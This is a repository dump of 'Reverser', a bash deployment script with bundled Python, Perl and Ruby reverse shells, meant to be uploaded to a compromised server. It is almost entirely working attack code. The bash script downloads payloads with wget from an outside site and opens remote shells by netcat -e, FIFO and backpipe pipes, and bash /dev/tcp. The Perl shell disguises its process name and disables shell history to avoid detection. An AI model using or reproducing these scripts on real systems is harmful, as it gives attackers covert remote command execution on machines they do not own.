├── README.txt ├── reverser.sh └── scripts ├── php-reverse.tar.gz ├── pi.py ├── pl-reverse.pl └── ruby-reverse.rb /README.txt: -------------------------------------------------------------------------------- 1 | README FOR REVERSER SCRIPT 2 | 3 | NAME: REVERSER.SH 4 | DESC: Quick Reverse Connection Deployment Script 5 | VERSION: 1 6 | AUTHOR: Hood3dRob1n 7 | 8 | INSTRUCTIONS: 9 | A) Upload Script to Server 10 | B) chmod +x reverser.sh 11 | C) ./reverser.sh <#1-8> IP PORT 12 | 13 | Once launched it will create a reverse connection using your method of choice and call home to the IP given on the designated port. Don't forget to set your local listener up before running! 14 | 15 | USAGE: ./reverser.sh <#1-8> IP PORT 16 | EX: ./reverser.sh 6 192.168.1.22 5151 17 | 18 | OPTIONS: 19 | 1) Pentestmonkey PHP Reverse Shell 20 | 2) NETCAT with GAPING_SECURITY_HOLE enabled 21 | 3) NETCAT with GAPING_SECURITY_HOLE disabled - Backpipe Method 22 | 4) NETCAT with GAPING_SECURITY_HOLE disabled - FIFO Method 23 | 5) Bash /dev/tcp socket method 24 | 6) Pentestmonkey Perl Reverse Shell 25 | 7) Python Reverse Shell by Pi 26 | 8) MagicC0d3r Ruby Reverse Shell 27 | 28 | NOTE: I have hosted the external connection scripts on my own hosting site for general usage. You can download the scripts through github and host them where you like. Simply change line 13 to point to where you put them and possibly alter the wget calls as needed, or follow the same path conventions on your hosting setup (just place them in the scripts/ folder on your hosting and it should be fine). 29 | 30 | 31 | A FEW CREDITS DUE: 32 | pentestmonkey@pentestmonkey.net for the Perl & PHP based reverse connection scripts. I made very minor mods to them to allow processing via the scripted method, nothing else. Thanks for an awesome site and lots of neat scripts! 33 | 34 | MagicC0d3r for the great Ruby based script! 35 | 36 | Pi, my good friend, for the great Python based option! 
37 | -------------------------------------------------------------------------------- /reverser.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Quick Reverse Connection Deployment Script 3 | # By Hood3dRob1n 4 | # 5 | # Upload Script to Server, chmod +x reverser.sh, ./reverser.sh <#1-8> IP PORT 6 | # Will create reverse connection using your method of choice and call home to IP given on designated port 7 | # Dont forget to set your listener up before running.... 8 | 9 | # Set variables 10 | METHOD="$1" 11 | HOME="$2" 12 | PORT="$3" 13 | LINK="http://inf0rm3r.webuda.com/" 14 | 15 | # Usage details 16 | usage_info(){ 17 | cat << "EOT" 18 | USAGE: ./reverser.sh <#1-8> IP PORT 19 | EX: ./reverser.sh 6 192.168.1.22 5151 20 | 21 | OPTIONS: 22 | 1) Pentestmonkey PHP Reverse Shell 23 | 2) NETCAT with GAPING_SECURITY_HOLE enabled 24 | 3) NETCAT with GAPING_SECURITY_HOLE disabled - Backpipe Method 25 | 4) NETCAT with GAPING_SECURITY_HOLE disabled - FIFO Method 26 | 5) Bash /dev/tcp socket method 27 | 6) Pentestmonkey Perl Reverse Shell 28 | 7) Python Reverse Shell by Pi 29 | 8) MagicC0d3r Ruby Reverse Shell 30 | 31 | EOT 32 | exit 0; 33 | } 34 | 35 | # Pentestmonkey PHP Reverse Shell with HR mods 36 | PPHP(){ 37 | echo 38 | if [ -d php-reverse ]; then 39 | rm -r php-reverse 40 | fi 41 | mkdir php-reverse 42 | cd php-reverse 43 | wget $LINK/scripts/php-reverse.tar.gz 2> /dev/null 44 | tar -zxvf php-reverse.tar.gz 2> /dev/null 45 | chmod +x php-reverse.php 46 | echo 'Deploying shell, be ready to catch the call home...' 47 | php -f php-reverse.php $HOME $PORT 48 | cd .. 49 | } 50 | 51 | # Netcat -e Gaping Hole Enabled Option 52 | NETCAT_e(){ 53 | echo 54 | command -v nc >/dev/null 2>&1 || { echo >&2 "Netcat isn't installed! Can't use this option without it..."; exit 0; } 55 | echo "OK, launching standard Netcat reverse shell now..." 
56 | nc -e /bin/sh $HOME $PORT 57 | } 58 | 59 | # NO -e option, so use Backpipe Method 60 | NETCAT_backpipe(){ 61 | echo 62 | command -v nc >/dev/null 2>&1 || { echo >&2 "Netcat isn't installed! Can't use this option without it..."; exit 0; } 63 | echo "OK, that's all we need, launching Netcat backpiped reverse shell now..." 64 | mknod backpipe p && nc $HOME $PORT 0backpipe 65 | } 66 | 67 | # NO -e option, so use FIFO Method 68 | NETCAT_fifo(){ 69 | echo 70 | command -v nc >/dev/null 2>&1 || { echo >&2 "Netcat isn't installed! Can't use this option without it..."; exit 0; } 71 | echo "OK, that's all we need, launching Netcat backpiped reverse shell now..." 72 | rm /tmp/f 2> /dev/null 73 | mkfifo /tmp/f 74 | cat /tmp/f | /bin/sh -i 2>&1 | nc $HOME $PORT > /tmp/f 75 | } 76 | 77 | # Straight /dev/tcp connection 78 | dev_tcp(){ 79 | echo 80 | echo "OK, launching bash and /dev/tcp scoket based reverse shell now..." 81 | /bin/bash -i > /dev/tcp/$HOME/$PORT 0<&1 2>&1 82 | } 83 | 84 | # Pentestmonkey Perl Reverse Shell 85 | PPerl(){ 86 | echo 87 | echo 'Fetching pentestmonkey Perl reverse shell script...' 88 | wget $LINK/scripts/pl-reverse.pl 2> /dev/null 89 | chmod +x pl-reverse.pl 90 | echo 'Deploying pentestmonkey Perl reverse shell...' 91 | ./pl-reverse.pl $HOME $PORT 92 | } 93 | 94 | #Python Reverse Shell by Pi from HF 95 | PiPython(){ 96 | echo 97 | echo "OK, fetching Pi's Python Revesrse Shell..." 98 | wget $LINK/scripts/pi.py 2> /dev/null 99 | chmod +x pi.py 100 | echo "Deploying Pi's Python Revesrse Shell..." 101 | ./pi.py $HOME $PORT 102 | } 103 | 104 | # MagicC0d3r Ruby Reverse Shell 105 | ruby_magic(){ 106 | echo 107 | command -v ruby >/dev/null 2>&1 || { echo >&2 "Ruby isn't installed! Can't use this option without it..."; exit 0; } 108 | echo "OK, fetching Ruby reverse shell now..." 
109 | if [ -d ruby-reverse ]; then 110 | rm -r ruby-reverse 111 | fi 112 | mkdir ruby-reverse 113 | cd ruby-reverse 114 | wget $LINK/scripts/ruby-reverse.rb 2> /dev/null 115 | chmod +x ruby-reverse.rb 116 | echo 'Deploying Ruby Reverse Shell, hope you have your listener ready...' 117 | ruby ruby-reverse.rb $HOME $PORT 118 | cd .. 119 | } 120 | 121 | #MAIN!!!!!!!!!!!!!!!! 122 | #Confirm arguments passed properly (should probably replace later with while getopts style statement but this is it for now 123 | if [ -z "$1" ] || [ "$#" -ne 3 ] || [ "$1" == "-h" ] || [ "$1" == "--help" ]; then 124 | usage_info 125 | else 126 | if [ "$1" -eq 1 ]; then 127 | echo 128 | PPHP 129 | fi 130 | if [ "$1" -eq 2 ]; then 131 | echo 132 | NETCAT_e 133 | fi 134 | if [ "$1" -eq 3 ]; then 135 | echo 136 | NETCAT_backpipe 137 | fi 138 | if [ "$1" -eq 4 ]; then 139 | echo 140 | NETCAT_fifo 141 | fi 142 | if [ "$1" -eq 5 ]; then 143 | echo 144 | dev_tcp 145 | fi 146 | if [ "$1" -eq 6 ]; then 147 | echo 148 | PPerl 149 | fi 150 | if [ "$1" -eq 7 ]; then 151 | echo 152 | PiPython 153 | fi 154 | if [ "$1" -eq 8 ]; then 155 | echo 156 | ruby_magic 157 | fi 158 | fi 159 | # Greetz to and from INTRA! 160 | # Enjoy! 
161 | #EOF 162 | -------------------------------------------------------------------------------- /scripts/php-reverse.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hood3dRob1n/Reverser/e81cbfd73a3955ce1d986b54fec6e336eb659985/scripts/php-reverse.tar.gz -------------------------------------------------------------------------------- /scripts/pi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import os, socket, sys 3 | 4 | #Provide geenral usage statement fo rnewbies 5 | def usage(): 6 | print ''' 7 | +----------------------------+ 8 | | scriptname.py IP PORT | 9 | |--------e-x-a-m-p-l-e-------| 10 | | script.py 192.168.1.2 9999 | 11 | +----------------------------+''',exit() 12 | 13 | #Put down an interupt catcher 14 | def signalHandler(signal, frame): 15 | print("[!] CTRL+C received [!] shutting down now..."); 16 | sys.exit() 17 | 18 | 19 | if len(sys.argv) < 3:usage() 20 | 21 | #Establish our throw back using IP and PORT passed at run time 22 | s=socket.socket() 23 | s.connect((sys.argv[1],int(sys.argv[2]))) 24 | #Print pretty banner upon connect in 25 | 26 | s.send(''' 27 | __ 28 | ___ ___ _ _ ___ | | 29 | ___| | | |_ ___ _| | |_ _ _ ___| | 30 | | _| | | | | _|___| . 
| | | | | | |__| 31 | |_| |___|___|_| |___|___|_____|_|_|__| 32 | 33 | A Python Reverse Shell By: Pi 34 | 35 | 36 | Type "exit" to exit the shell\n[r00t-d0wn]cmd>''') 37 | 38 | while 1: 39 | data = s.recv(512) 40 | if data.lower()=="q": 41 | s.close() 42 | break; 43 | else: 44 | if data.startswith('exit'): 45 | s.close() 46 | break; 47 | else: 48 | result=os.popen(data).read() 49 | if (data.lower() != "q"): 50 | s.send(str(result)+"[r00t-d0wn]cmd>") 51 | else: 52 | s.send(str(result)) 53 | s.close() 54 | break; 55 | exit() 56 | -------------------------------------------------------------------------------- /scripts/pl-reverse.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | # perl-reverse-shell - A Reverse Shell implementation in PERL 3 | # Copyright (C) 2006 pentestmonkey@pentestmonkey.net 4 | # 5 | # This tool may be used for legal purposes only. Users take full responsibility 6 | # for any actions performed using this tool. The author accepts no liability 7 | # for damage caused by this tool. If these terms are not acceptable to you, then 8 | # do not use this tool. 9 | # 10 | # In all other respects the GPL version 2 applies: 11 | # 12 | # This program is free software; you can redistribute it and/or modify 13 | # it under the terms of the GNU General Public License version 2 as 14 | # published by the Free Software Foundation. 15 | # 16 | # This program is distributed in the hope that it will be useful, 17 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 18 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 19 | # GNU General Public License for more details. 20 | # 21 | # You should have received a copy of the GNU General Public License along 22 | # with this program; if not, write to the Free Software Foundation, Inc., 23 | # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 24 | # 25 | # This tool may be used for legal purposes only. 
Users take full responsibility 26 | # for any actions performed using this tool. If these terms are not acceptable to 27 | # you, then do not use this tool. 28 | # 29 | # You are encouraged to send comments, improvements or suggestions to 30 | # me at pentestmonkey@pentestmonkey.net 31 | # 32 | # Description 33 | # ----------- 34 | # This script will make an outbound TCP connection to a hardcoded IP and port. 35 | # The recipient will be given a shell running as the current user (apache normally). 36 | # 37 | # Minor mod to setting IP & Port as arguments passed at run time so I can use within reverser 38 | # H.R. :) 39 | use strict; 40 | use Socket; 41 | use FileHandle; 42 | use POSIX; 43 | my $VERSION = "1.0"; 44 | 45 | # Where to send the reverse shell. Change these. 46 | my $ip = "$ARGV[0]"; 47 | my $port = "$ARGV[1]"; 48 | 49 | # Options 50 | my $daemon = 1; 51 | my $auth = 0; # 0 means authentication is disabled and any 52 | # source IP can access the reverse shell 53 | my $authorised_client_pattern = qr(^127\.0\.0\.1$); 54 | 55 | # Declarations 56 | my $global_page = ""; 57 | my $fake_process_name = "/usr/sbin/apache"; 58 | 59 | # Change the process name to be less conspicious 60 | $0 = "[httpd]"; 61 | 62 | # Authenticate based on source IP address if required 63 | if (defined($ENV{'REMOTE_ADDR'})) { 64 | cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}"); 65 | 66 | if ($auth) { 67 | unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) { 68 | cgiprint("ERROR: Your client isn't authorised to view this page"); 69 | cgiexit(); 70 | } 71 | } 72 | } elsif ($auth) { 73 | cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. 
Denying access"); 74 | cgiexit(0); 75 | } 76 | 77 | # Background and dissociate from parent process if required 78 | if ($daemon) { 79 | my $pid = fork(); 80 | if ($pid) { 81 | cgiexit(0); # parent exits 82 | } 83 | 84 | setsid(); 85 | chdir('/'); 86 | umask(0); 87 | } 88 | 89 | # Make TCP connection for reverse shell 90 | socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp')); 91 | if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) { 92 | cgiprint("Sent reverse shell to $ip:$port"); 93 | cgiprintpage(); 94 | } else { 95 | cgiprint("Couldn't open reverse shell to $ip:$port: $!"); 96 | cgiexit(); 97 | } 98 | 99 | # Redirect STDIN, STDOUT and STDERR to the TCP connection 100 | open(STDIN, ">&SOCK"); 101 | open(STDOUT,">&SOCK"); 102 | open(STDERR,">&SOCK"); 103 | $ENV{'HISTFILE'} = '/dev/null'; 104 | system("w;uname -a;id;pwd"); 105 | exec({"/bin/sh"} ($fake_process_name, "-i")); 106 | 107 | # Wrapper around print 108 | sub cgiprint { 109 | my $line = shift; 110 | $line .= "

\n"; 111 | $global_page .= $line; 112 | } 113 | 114 | # Wrapper around exit 115 | sub cgiexit { 116 | cgiprintpage(); 117 | exit 0; # 0 to ensure we don't give a 500 response. 118 | } 119 | 120 | # Form HTTP response using all the messages gathered by cgiprint so far 121 | sub cgiprintpage { 122 | print "Content-Length: " . length($global_page) . "\r 123 | Connection: close\r 124 | Content-Type: text\/html\r\n\r\n" . $global_page; 125 | } 126 | -------------------------------------------------------------------------------- /scripts/ruby-reverse.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | # Ruby Reverse Shell 3 | # MagicC0d3r@gmail.com 4 | # www.magiccoder.ir www.sun-army.org 5 | # License : GNU General Public License (GPL) 6 | #Usage : ruby reverse.rb IP PORT 7 | #Example: ruby reverse.rb 127.0.0.1 1370 8 | 9 | 10 | require 'net/telnet' 11 | 12 | if (ARGV[1] == nil) 13 | puts "\n\t MagicC0d3r Ruby Reverse Shell\n\tw/ mods for r00t-d0wn by Hood3dRob1n\n" 14 | puts "\nUsage\t: ruby reverse.rb \nExample\t: ruby reverse.rb 127.0.0.1 1370\n\n" 15 | else 16 | server = Net::Telnet::new('Host'=>ARGV[0],'Port'=>ARGV[1].to_i,'Timeout'=>300) 17 | server.puts "\n\t MagicC0d3r Ruby Reverse Shell\n\tw/ mods for r00t-d0wn by Hood3dRob1n\n" 18 | puts "Connected to #{ARGV[0]}:#{ARGV[1].to_i}" 19 | loop do 20 | server.print "[r00t-d0wn]$cmd> " 21 | command = server.gets 22 | break if command.chomp == "exit" 23 | server.print `#{command.to_s}` 24 | end 25 | puts "Disconnected" 26 | end 27 | --------------------------------------------------------------------------------